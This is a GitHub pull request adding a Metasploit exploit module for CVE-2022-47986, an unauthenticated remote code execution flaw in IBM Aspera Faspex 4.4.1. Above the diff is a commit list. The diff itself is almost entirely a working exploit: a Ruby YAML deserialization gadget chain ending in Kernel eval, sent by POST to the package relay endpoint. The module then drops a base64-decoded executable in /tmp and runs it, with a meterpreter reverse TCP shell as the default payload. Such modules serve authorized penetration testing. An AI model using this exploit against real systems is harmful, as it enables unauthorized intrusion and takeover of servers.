Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization #17760

Closed
Changes from 11 commits
Commits
Show all changes
23 commits
Select commit Hold shift + click to select a range
7b777a8
[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization
mauricelambert Mar 9, 2023
5a5ac57
Fix: exploit is a JSON string
mauricelambert Mar 9, 2023
50ca746
Fix: syntax error
mauricelambert Mar 10, 2023
91a834f
Fix: not implemented method
mauricelambert Mar 10, 2023
4382277
Fix: Payload JSON syntax
mauricelambert Mar 10, 2023
de886f2
Fix: JSON syntax
mauricelambert Mar 10, 2023
ab0ad19
Linting
mauricelambert Mar 10, 2023
4b978b6
Remove unused function
mauricelambert Mar 16, 2023
23add71
Payload random values
mauricelambert Mar 17, 2023
82749ac
Forgotten random value
mauricelambert Mar 17, 2023
4b87070
Payload random value
mauricelambert Mar 17, 2023
918cddb
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
a26d38c
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
830905a
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
4e8236d
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
0afbe40
Fix: random UUID in the payload
mauricelambert Apr 28, 2023
ed9a98e
Fix: replace uuid string
mauricelambert Apr 28, 2023
d9fa3de
Use string interpolation
mauricelambert Apr 28, 2023
d05fcc0
Use metasploit command stagers instead of custom payload
mauricelambert Apr 28, 2023
d53994f
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
65f78ca
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert May 22, 2023
6471007
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert May 22, 2023
a336652
Minor fixes including payload encoding
jheysel-r7 Jul 14, 2023
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,141 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::CheckModule
mauricelambert marked this conversation as resolved.
Show resolved Hide resolved
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
'Description' => %q{
This module exploit an unauthenticated RCE vulnerability
which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986).
mauricelambert marked this conversation as resolved.
Show resolved Hide resolved
},
'References' => [
['CVE', '2022-47986'],
['URL', 'https://www.ibm.com/support/pages/node/6952319'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
mauricelambert marked this conversation as resolved.
Show resolved Hide resolved
],
'Author' => [
'ohnonoyesyes', # POC
'Maurice LAMBERT', # Metasploit auxiliary module
],
'DisclosureDate' => '2023-02-02',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
'DefaultOptions' => {
'CheckModule' => '',
'Action' => 'CHECK_RCE',
mauricelambert marked this conversation as resolved.
Show resolved Hide resolved
'RPORT' => 443,
'SSL' => true
},
'Targets' => [
[
'Automatic (Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'DisablePayloadHandler' => 'false'
}
}
],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
end


def execute_command(command, _opts = {})
exploit = %q#
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "pew"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:PrettyPrint
output: !ruby/object:Net::WriteAdapter
socket: &1 !ruby/module "Kernel"
method_id: :eval
newline: "throw `command`"
buffer: {}
group_stack:
- !ruby/object:PrettyPrint::Group
break: true
method_id: :breakable
#.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')

uuid = SecureRandom.uuid
adfoster-r7 marked this conversation as resolved.
Show resolved Hide resolved
payload = %q#{
adfoster-r7 marked this conversation as resolved.
Show resolved Hide resolved
"package_file_list": [
"/"
],
"external_emails": "exploit",
"package_name": "assetnote_pack",
"package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
"original_sender_name": Rex::Text.rand_name(),
"package_uuid": uuid,
"metadata_human_readable": "Yes",
"forward": "pew",
"metadata_json": "{}",
"delivery_uuid": uuid,
"delivery_sender_name": Rex::Text.rand_name(),
"delivery_title": Rex::Text.rand_text_alphanumeric(4),
"delivery_note": Rex::Text.rand_text_alphanumeric(12),
"delete_after_download": true,
"delete_after_download_condition": "IDK"
}#.gsub(/exploit/, exploit)

response = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
'data' => payload
})
if response && response.body
return response.body
end

false
end

def exploit
file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"

print_status("Sending #{datastore['PAYLOAD']} command payload")
vprint_status("Generated command payload: #{cmd}")

execute_command(cmd)
adfoster-r7 marked this conversation as resolved.
Show resolved Hide resolved

register_file_for_cleanup file_name
mauricelambert marked this conversation as resolved.
Show resolved Hide resolved
end
end